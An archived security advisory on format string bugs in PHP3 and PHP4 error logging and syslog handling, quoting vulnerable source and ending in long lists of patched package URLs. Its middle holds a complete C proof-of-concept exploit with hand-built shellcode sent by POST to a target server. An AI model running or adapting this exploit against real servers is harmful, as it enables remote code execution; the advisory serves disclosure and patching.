Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: php3.htm

PHP3 and PHP4 format string vulnerabilities



Vulnerability

    PHP

Affected

    PHP3 and PHP4

Description

    Following  is  based  on  a  findings  by  Jouko Pynnen and Dildog
    (@stake).  According to Jouko PHP is a commonly used HTML-embedded
    scripting language.   Format string  vulnerabilities exist  in the
    error logging routines  of PHP versions  3 and 4,  allowing remote
    users to execute  arbitrary code under  the web server's  user id.
    A web server having PHP installed  and one or more PHP scripts  is
    vulnerable to the problem if error logging is enabled in  php.ini.
    Also  any  PHP  script  using  the  "syslog" command of PHP may be
    vulnerable, regardless of error logging.

    The problem was tested on a Red Hat Linux system having Apache and
    mod_php3 installed. Error logging was enabled in php.ini.  With  a
    test exploit program, a shellcode could be run remotely under  the
    web server user id, which is typically not the root user.

    In main.c, function php3_log_error():

        #if HAVE_SYSLOG_H
                        if (!strcmp(php3_ini.error_log, "syslog")) {
                                syslog(LOG_NOTICE, log_message);
                                return;
                        } else {
        #endif
                                log_file = fopen(php3_ini.error_log, "a");
                                if (log_file != NULL) {
                                        fprintf(log_file, log_message);
        ...

    This one is a classical "format bug".  There are a couple of other
    similar fprintf() calls  in the same  function, as well  as Apache
    API function calls to aplog_error() and log_error() which all  use
    the log_message as a format string.

    The message can be trivially  generated with any php3 script  on a
    web  server,  for   example  by  sending   a  POST  request   with
    content-type "multipart/form-data" but without a boundary  string.
    A shellcode  and other  data may  be placed  in the error message.
    The error  message can  be generated  without the  script actually
    wanting to process any POST data.

    Another format bug in functions/syslog.c, function php3_syslog:

        syslog(priority->value.lval, message->value.str.val);

    The  "syslog"   command  of   PHP  takes   two  parameters,    the
    priority/facility number and the  message itself.  The  message is
    always  passed  to  libc  syslog()  as  a format string.  Thus any
    program  doing  syslogging  may  be  vulnerable to a format string
    attack;  details  depend  on  the  script  in  question.  The code
    fragments  above   are  taken   from  PHP   3  sources,   but  the
    vulnerabilities exist in PHP version 4 too.

    Here's what @stake had to say.  PHP versions 3 and 4 employ a  set
    of logging functions that,  through an improper use  of 'syslog()'
    and 'vsnprintf()', render it  vulnerable to attack.   The attacker
    could utilize  this vulnerability  to remotely  compromise any PHP
    enabled webserver that has logging  to either syslog or to  a file
    enabled  in  the  'php.ini'  configuration  file.  This particular
    attack  does  not  affect  PHP  installations  that do not log PHP
    errors and warnings.

    PHP versions 3 and 4 utilize the following functions:

        main/php_syslog.h:

        #define php_syslog syslog


        main/main.c:

        void php_log_err(char *log_message)
        {
	        ...
	        php_syslog(LOG_NOTICE, log_message)
	        ...

	        fprintf(log_file, "[%s] ", error_time_str);
	        fprintf(log_file, log_message);
                        fprintf(log_file, "\n");
        ...
        }

    Hence, if the "log_message" contains  any user input at all,  then
    it  creates  a   vulnerability.   An   exploitable  condition   is
    presented  in  the  following  code  for PHP 3, since 'php3_error'
    calls down to php_log_err if logging is enabled:

        main/main.c:

        PHPAPI void php3_error(int type, const char *format,...) {
	        ...
	        char log_buffer[1024];
                        snprintf(log_buffer, 1024, "PHP 3 %s:  %s in %s on line %d",
        error_type_str, buffer, filename, php3_get_lineno(GLOBAL(current_lineno)));

	        php3_log_err(log_buffer);
	        ...
        }


        functions/post.c:

        static char *php3_getpost(pval *http_post_vars)
        {
	        ...
	        php3_error(E_WARNING, "File Upload Error: No MIME boundary
	        found");
                php3_error(E_WARNING, "There should have been a
	        \"boundary=3Dsomething\" in the Content-Type string");
	        php3_error(E_WARNING, "The Content-Type string was: \"%s\"",
	        ctype);
	        ...
        }

    PHP4 looks vulnerable as well, but  in a different place.  When  a
    file is uploaded via a  post operation, if the file  name contains
    format string exploit code, and  the file size is larger  than the
    maximum file  size for  uploads, the  following code  is executed.
    Note that  this possible  problem has  not been  tested by @stake,
    but the code path looks problematic:

        static void php_mime_split(char *buf, int cnt, char *boundary, zval
        *array_ptr)
        {
	        ...
	        php_error(E_WARNING, "Max file size exceeded - file [%s] not
	        saved", namebuf);
	        ...
        }

    Following proof  of concept  code creates  a zero  length file  in
    /tmp/BADPHP.  Use like this:

        gcc badphp.c && ./a.out <ip address of webserver> <port of webserver> <php file path>

    (php  file  path  must  point  to  an  existing  php file, such as
    /foo.php3)

    #include<stdio.h>
    #include<sys/types.h>
    #include<sys/socket.h>
    #include<netinet/in.h>
    #include<arpa/inet.h>
    #include<netdb.h>

    #define BSIZE 1549
    #define BUFFERZONE 128

    int main(int argc, char *argv[])
    {
      int i,start,count;
      int stackloc=0xBFFFDA60;
      int s;
      FILE *f;
      fd_set rfds;
      struct hostent *he;
      struct sockaddr_in saddr;
      char sploit[BSIZE];
      char file[]="/tmp/BADPHP";
      char c;

      if(argc!=5) {
        printf("%s <addr> <port> <offset> <php file name>\n",argv[0]);
        printf("offset=0 for most systems.\n");
        return 0;
      }

      /*** build exploit string ***/

      /* write bad format string, adding in offset */
      snprintf(sploit,sizeof(sploit),
	       "Content-Type:multipart/form-data %%%uX%%X%%X%%hn",
	       55817 /*+offset0,1,2,3*/ );

      /* fill with breakpoints and nops*/
      start=strlen(sploit);
      memset(sploit+start,0xCC,BSIZE-start);
      memset(sploit+start+BUFFERZONE*4,0x90,BUFFERZONE*4);
      sploit[BSIZE-1]=0;

      /* pointer to start of code (stackloc+4) */
      count=BUFFERZONE;
      for(i=0;i<count;i++) {
        unsigned int value=stackloc+4+(count*4);
        if((value&0x000000FF)==0) value|=0x00000004;
        if((value&0x0000FF00)==0) value|=0x00000400;
        if((value&0x00FF0000)==0) value|=0x00040000;
        if((value&0xFF000000)==0) value|=0x04000000;
        *(unsigned int *)&(sploit[start+i*4])=value;
      }
      start+=BUFFERZONE*4*2;

      /*** build shellcode ***/

      sploit[start+0]=0x90; /* nop */

      sploit[start+1]=0xBA; /* mov edx, (not 0x1B6 (a+rw)) */
      sploit[start+2]=0x49;
      sploit[start+3]=0xFE;
      sploit[start+4]=0xFF;
      sploit[start+5]=0xFF;

      sploit[start+6]=0xF7; /* not edx */
      sploit[start+7]=0xD2;

      sploit[start+8]=0xB9; /* mov ecx, (not 0x40 (O_CREAT)) */
      sploit[start+9]=0xBF;
      sploit[start+10]=0xFF;
      sploit[start+11]=0xFF;
      sploit[start+12]=0xFF;

      sploit[start+13]=0xF7; /* not ecx */
      sploit[start+14]=0xD1;

      sploit[start+15]=0xE8; /* call eip+4 + inc eax (overlapping) */
      sploit[start+16]=0xFF;
      sploit[start+17]=0xFF;
      sploit[start+18]=0xFF;
      sploit[start+19]=0xFF;
      sploit[start+20]=0xC0;
      sploit[start+21]=0x5B; /* pop ebx */
      sploit[start+22]=0x6A; /* push 22 (offset to end of sploit (filename)) */
      sploit[start+23]=0x16;
      sploit[start+24]=0x58; /* pop eax */
      sploit[start+25]=0x03; /* add ebx,eax */
      sploit[start+26]=0xD8;

      sploit[start+27]=0x33; /* xor eax,eax */
      sploit[start+28]=0xC0;

      sploit[start+29]=0x88; /* mov byte ptr [ebx+11],al */
      sploit[start+30]=0x43;
      sploit[start+31]=0x0B;

      sploit[start+32]=0x83; /* add eax,5 */
      sploit[start+33]=0xC0;
      sploit[start+34]=0x05;

      sploit[start+35]=0xCD; /* int 80 (open) */
      sploit[start+36]=0x80;

      sploit[start+37]=0x33; /* xor eax,eax */
      sploit[start+38]=0xC0;

      sploit[start+39]=0x40; /* inc eax */

      sploit[start+40]=0xCD; /* int 80 (_exit) */
      sploit[start+41]=0x80;

      /* add filename to touch */
      strncpy(&sploit[start+42],file,strlen(file));

      /*** send exploit string ***/

      /* create socket */
      s=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
      if(s<0) {
        printf("couldn't create socket.\n");
        return 0;
      }

      /* connect to port */
      memset(&saddr,0,sizeof(saddr));
      saddr.sin_family=AF_INET;
      saddr.sin_port=htons(atoi(argv[2]));
      he=gethostbyname(argv[1]);
      if(he==NULL) {
        printf("invalid hostname.\n");
      }
      memcpy(&(saddr.sin_addr.s_addr),he->h_addr_list[0],sizeof(struct in_addr));

      if(connect(s,(struct sockaddr *)&saddr,sizeof(saddr))!=0) {
        printf("couldn't connect.\n");
        return 0;
      }

      /* fdopen the socket to use stream functions */
      f=fdopen(s,"w");
      if(f==NULL) {
        close(s);
        printf("couldn't fdopen socket.\n");
        return 0;
      }

      /* put the post request to the socket */
      fprintf(f,"POST %s HTTP/1.0\n",argv[4]);
      fputs(sploit,f);
      fputc('\n',f);
      fputc('\n',f);
      fflush(f);

      /* close the socket */
      fclose(f);
      close(s);

      return 0;
    }

Solution

    A temporary  workaround is  to disable  error logging  in php.ini,
    and disable any PHP  scripts that use the  syslog command.  A  new
    fixed version of PHP 4 is downloadable at

        http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz

    A fixed version of PHP3 is available:

        http://www.php.net/distributions/php-3.0.17.tar.gz

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/imap-4.7c2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/libxmltok-1.0-3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/imap-4.7c2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/imap-devel-4.7c2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/libxmltok-1.0-3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/libxmltok-devel-1.0-3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/imap-4.7c2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/libxmltok-1.0-3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/imap-4.7c2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/imap-devel-4.7c2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/libxmltok-1.0-3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/libxmltok-devel-1.0-3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/mod_php3-3.0.17-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-doc-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/mod_php3-xml-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-gd-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-imap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-ldap-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-mysql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-pgsql-3.0.17-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/php3-cgi-xml-3.0.17-1cl.i386.rpm

    For Linux-Mandrake:

        Linux-Mandrake 6.1: 6.1/RPMS/mod_php3-3.0.17-1mdk.i586.rpm
                            6.1/RPMS/mod_php3-imap-3.0.17-1mdk.i586.rpm
                            6.1/RPMS/mod_php3-manual-3.0.17-1mdk.i586.rpm
                            6.1/RPMS/mod_php3-pgsql-3.0.17-1mdk.i586.rpm
                            6.1/SRPMS/mod_php3-3.0.17-1mdk.src.rpm
        Linux-Mandrake 7.0: 7.0/RPMS/mod_php3-3.0.17-1mdk.i586.rpm
                            7.0/RPMS/mod_php3-imap-3.0.17-1mdk.i586.rpm
                            7.0/RPMS/mod_php3-manual-3.0.17-1mdk.i586.rpm
                            7.0/RPMS/mod_php3-pgsql-3.0.17-1mdk.i586.rpm
                            7.0/SRPMS/mod_php3-3.0.17-1mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/mod_php3-3.0.17-2mdk.i586.rpm
                            7.1/RPMS/mod_php3-imap-3.0.17-2mdk.i586.rpm
                            7.1/RPMS/mod_php3-ldap-3.0.17-2mdk.i586.rpm
                            7.1/RPMS/mod_php3-manual-3.0.17-2mdk.i586.rpm
                            7.1/RPMS/mod_php3-mysql-3.0.17-2mdk.i586.rpm
                            7.1/RPMS/mod_php3-pgsql-3.0.17-2mdk.i586.rpm
                            7.1/SRPMS/mod_php3-3.0.17-2mdk.src.rpm

    Slink Debian contains php3 version 3.0.5, which is believed to  be
    affected  by  this  problem.   No  security  updates for slink are
    available at this  time; Slink users  who have php3  installed are
    highly recommended to  either upgrade to  potato or recompile  the
    potato php3 packages from source (see the URLs below).

    For Debian GNU/Linux 2.2 (stable) alias potato:

        http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3-0potato1.diff.gz
        http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3-0potato1.dsc
        http://security.debian.org/dists/potato/updates/main/source/php4_4.0.3.orig.tar.gz
        http://security.debian.org/dists/potato/updates/main/binary-all/php4-dev_4.0.3-0potato1_all.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-gd_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-imap_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-ldap_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-mhash_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-mysql_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-pgsql_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-snmp_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi-xml_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-cgi_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-gd_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-imap_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-ldap_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-mhash_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-mysql_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-pgsql_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-snmp_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4-xml_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-alpha/php4_4.0.3-0potato1_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-gd_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-imap_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-ldap_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-mhash_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-mysql_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-pgsql_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-snmp_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi-xml_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-cgi_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-gd_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-imap_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-ldap_4.0.3-0potato1_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/php4-mhash_4.0.3-0potato1_i386.deb
